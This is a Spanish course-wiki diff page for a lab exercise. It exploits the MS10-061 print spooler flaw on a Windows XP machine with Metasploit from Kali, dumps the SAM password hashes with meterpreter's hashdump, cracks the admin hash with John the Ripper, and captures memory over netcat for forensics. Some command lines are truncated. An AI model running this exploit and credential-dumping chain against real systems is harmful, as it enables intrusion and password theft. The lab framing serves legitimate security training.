sad:t2:m4
Diferencias
Muestra las diferencias entre dos versiones de la página.
Ambos lados, revisión anteriorRevisión previaPróxima revisión | Revisión previa | ||
sad:t2:m4 [2018/12/17 11:21] – José Manuel Guallar | sad:t2:m4 [2019/01/10 14:40] (actual) – José Manuel Guallar | ||
---|---|---|---|
Línea 1: | Línea 1: | ||
====== Metasploit 4 ====== | ====== Metasploit 4 ====== | ||
- | Escenario | + | **Escenario** |
¿Alguna vez ha oído hablar de cómo alguien fue capaz de conectarse a una impresora compartida y más tarde obtener el privilegio de administrador de esa máquina? Bueno, los atacantes pueden usar la técnica que Stuxnet para obtener privilegios para los servidores Windows XP y Windows 2003 que comparten impresoras. Esta lección proporcionará (1) el reconocimiento para ver esta vulnerabilidad potencial, (2) realizar la explotación, | ¿Alguna vez ha oído hablar de cómo alguien fue capaz de conectarse a una impresora compartida y más tarde obtener el privilegio de administrador de esa máquina? Bueno, los atacantes pueden usar la técnica que Stuxnet para obtener privilegios para los servidores Windows XP y Windows 2003 que comparten impresoras. Esta lección proporcionará (1) el reconocimiento para ver esta vulnerabilidad potencial, (2) realizar la explotación, | ||
- | ¿Qué es Helix? | + | ** ¿Qué es Helix?** |
Helix es una distribución personalizada del CD de Knoppix Live Linux. Se centra en la respuesta de incidentes y la informática forense. Helix es algo más que un CD de arranque en vivo. Con Helix puedes arrancar en un robusto entorno Linux que incluye (1) un kernel Linux personalizable, | Helix es una distribución personalizada del CD de Knoppix Live Linux. Se centra en la respuesta de incidentes y la informática forense. Helix es algo más que un CD de arranque en vivo. Con Helix puedes arrancar en un robusto entorno Linux que incluye (1) un kernel Linux personalizable, | ||
Línea 15: | Línea 15: | ||
El directorio de trabajo en ese momento es %SystemRoot%system32. Un atacante puede especificar cualquier nombre de archivo, incluyendo rutas transversales o completas de directorios. Al enviar solicitudes WritePrinter, | El directorio de trabajo en ese momento es %SystemRoot%system32. Un atacante puede especificar cualquier nombre de archivo, incluyendo rutas transversales o completas de directorios. Al enviar solicitudes WritePrinter, | ||
- | Referencias | + | **Referencias** |
* http:// | * http:// | ||
* https:// | * https:// | ||
- | Requisitos para hacer esta practica | + | **Requisitos para hacer esta practica** |
* Maquina XP | * Maquina XP | ||
* Kali | * Kali | ||
- | Post requisitos | + | ** Post requisitos** |
* Volatility | * Volatility | ||
- | Que haremos en esta practica | + | **Que haremos en esta practica** |
* Descargar Helix2008R1 | * Descargar Helix2008R1 | ||
Línea 71: | Línea 71: | ||
Utilizamos el nmap TCP SYN Scan (-sS) y UDP (-sU) para buscar rápidamente en el XP los puertos de NetBios 137 a 139 y 445. Tambien usamos -= (Footprint del sistema operativo), para que nos diga que sistema operativo estamos | Utilizamos el nmap TCP SYN Scan (-sS) y UDP (-sU) para buscar rápidamente en el XP los puertos de NetBios 137 a 139 y 445. Tambien usamos -= (Footprint del sistema operativo), para que nos diga que sistema operativo estamos | ||
- | NetBIOS es un acrónimo de sistema de entrada/ | + | **NetBIOS** es un acrónimo de sistema de entrada/ |
Se utiliza el puerto TCP 445 para acceso directo de red de Microsoft TCP/IP sin necesidad de una capa de NetBIOS. El protocolo SMB (Server Message Block) se utiliza entre otras cosas para archivos compartidos en Windows NT / 2K/ | Se utiliza el puerto TCP 445 para acceso directo de red de Microsoft TCP/IP sin necesidad de una capa de NetBIOS. El protocolo SMB (Server Message Block) se utiliza entre otras cosas para archivos compartidos en Windows NT / 2K/ | ||
Línea 95: | Línea 95: | ||
{{: | {{: | ||
- | + | ** | |
- | Acceso a los recursos SMB | + | Acceso a los recursos SMB** |
< | < | ||
Línea 120: | Línea 120: | ||
msfconsole | msfconsole | ||
search ms10_061 | search ms10_061 | ||
- | use exploit/ | + | use exploit/ |
info | info | ||
set PAYLOAD windows/ | set PAYLOAD windows/ | ||
Línea 177: | Línea 177: | ||
(/fi) es un filtro; y ( "PID EQ " 1876 ") filtrar o mostrar sólo un PID que coincida con 196. | (/fi) es un filtro; y ( "PID EQ " 1876 ") filtrar o mostrar sólo un PID que coincida con 196. | ||
- | netstat muestra conexiones de red. | + | **netstat** muestra conexiones de red. |
(-n) muestra direcciones y números de puerto en forma numérica | (-n) muestra direcciones y números de puerto en forma numérica | ||
Línea 185: | Línea 185: | ||
(-o) muestra el identificador de proceso propietario asociado a cada conexión. | (-o) muestra el identificador de proceso propietario asociado a cada conexión. | ||
- | 21 | + | {{: |
- | 22 | + | |
+ | |||
+ | {{: | ||
===== Archivos Forenses Basicos ===== | ===== Archivos Forenses Basicos ===== | ||
< | < | ||
- | tasklist > forensics_tasklist.txt | + | tasklist > forense_tasklist.txt |
- | netstat -nao > forensics_netstat.txt | + | netstat -nao > forense_netstat.txt |
- | dir > forensics_dir.txt | + | dir > forense_dir.txt |
exit | exit | ||
</ | </ | ||
Línea 202: | Línea 204: | ||
Comando 4, salimos del shell de comandos y vuelva a la solicitud de meterpreter. | Comando 4, salimos del shell de comandos y vuelva a la solicitud de meterpreter. | ||
- | 23 | ||
+ | {{: | ||
+ | ** | ||
+ | Obtener la base de datos SAM** | ||
+ | [[https:// | ||
+ | |||
+ | El administrador de cuentas de seguridad Security Account Manager (SAM) es un archivo de base de datos en Windows XP, Windows Vista y Windows 7 que almacena las contraseñas de los usuarios | ||
+ | |||
+ | < | ||
+ | hashdump | ||
+ | # seleccionamos todo, boton derecho del raton y copiar | ||
</ | </ | ||
+ | |||
+ | {{: | ||
+ | |||
+ | < | ||
+ | gnome-text-editor samhash.txt | ||
+ | # pegamos y guardamos el fichero | ||
+ | </ | ||
+ | |||
+ | |||
+ | {{: | ||
+ | |||
+ | **Preparacion para la recogida de datos de la memoria** | ||
+ | |||
+ | < | ||
+ | mkdir -p / | ||
+ | cd / | ||
+ | nc -l -vvv -p 8888 > ms10_061.dd | ||
+ | </ | ||
+ | |||
+ | Se crea un directorio | ||
+ | |||
+ | Se cambia el directorio en/forense /ms10_061. | ||
+ | |||
+ | Creamos un escucha netcat (-l) en el puerto (-p) 8888 en modo detallado extremo (-vvv) redirigir (>) salida en un archivo (ms10_016.dd) | ||
+ | |||
+ | {{: | ||
+ | |||
+ | |||
+ | ===== Memoria del XP ===== | ||
+ | |||
+ | |||
+ | Click en CD/DVD(IDE) | ||
+ | |||
+ | |||
+ | {{: | ||
+ | |||
+ | Aceptamos pinchamos en la camara | ||
+ | |||
+ | * en origen ponemos Physical Memory | ||
+ | * Localizacion NetCat | ||
+ | * Ip Destino la del Kali | ||
+ | * puerto 8888 | ||
+ | |||
+ | |||
+ | {{: | ||
+ | |||
+ | En el momento que pulsamos start se empieza la captura de la memoria del xp a través de la red con la red netcat que se ejecuta en Kali | ||
+ | |||
+ | |||
+ | {{: | ||
+ | |||
+ | La pantalla negra desaparece cuando se haya terminado de copiar toda la memoria | ||
+ | |||
+ | ===== Recuperar archivos del xp. ===== | ||
+ | |||
+ | En el Kali | ||
+ | |||
+ | vemos que una ver terminado nos indica la cantidad de bits de memoria capturada | ||
+ | |||
+ | |||
+ | {{: | ||
+ | |||
+ | Descarga de los ficheros forenses en el meterpreter | ||
+ | |||
+ | |||
+ | < | ||
+ | pwd | ||
+ | download C: | ||
+ | download C: | ||
+ | download C: | ||
+ | download C: | ||
+ | </ | ||
+ | |||
+ | |||
+ | RvOYs3UqrJqo7a.exe en vuestro caso el que se haya creado en el ordenador | ||
+ | |||
+ | |||
+ | |||
+ | {{: | ||
+ | |||
+ | En otra ventana de terminal ejecutaremos un John The Ripper | ||
+ | |||
+ | < | ||
+ | cp / | ||
+ | grep -i admin samhash.txt > adminhash.txt | ||
+ | # cat /dev/null > / | ||
+ | john --format=nt adminhash.txt | ||
+ | </ | ||
+ | |||
+ | |||
+ | {{: | ||
+ | |||
+ | |||
+ | {{: | ||
+ | |||
+ | print de pantalla final que hay que entregar | ||
+ | |||
+ | |||
+ | < | ||
+ | ls -lrta | ||
+ | grep " | ||
+ | grep " | ||
+ | # Reemplazalo por tu PID | ||
+ | grep " | ||
+ | grep " | ||
+ | # Reemplaza (RvOYs3UqrJqo7a.exe) por tu programa malicioso | ||
+ | date | ||
+ | echo "Tu nombre" | ||
+ | </ | ||
sad/t2/m4.1545045699.txt.gz · Última modificación: (editor externo)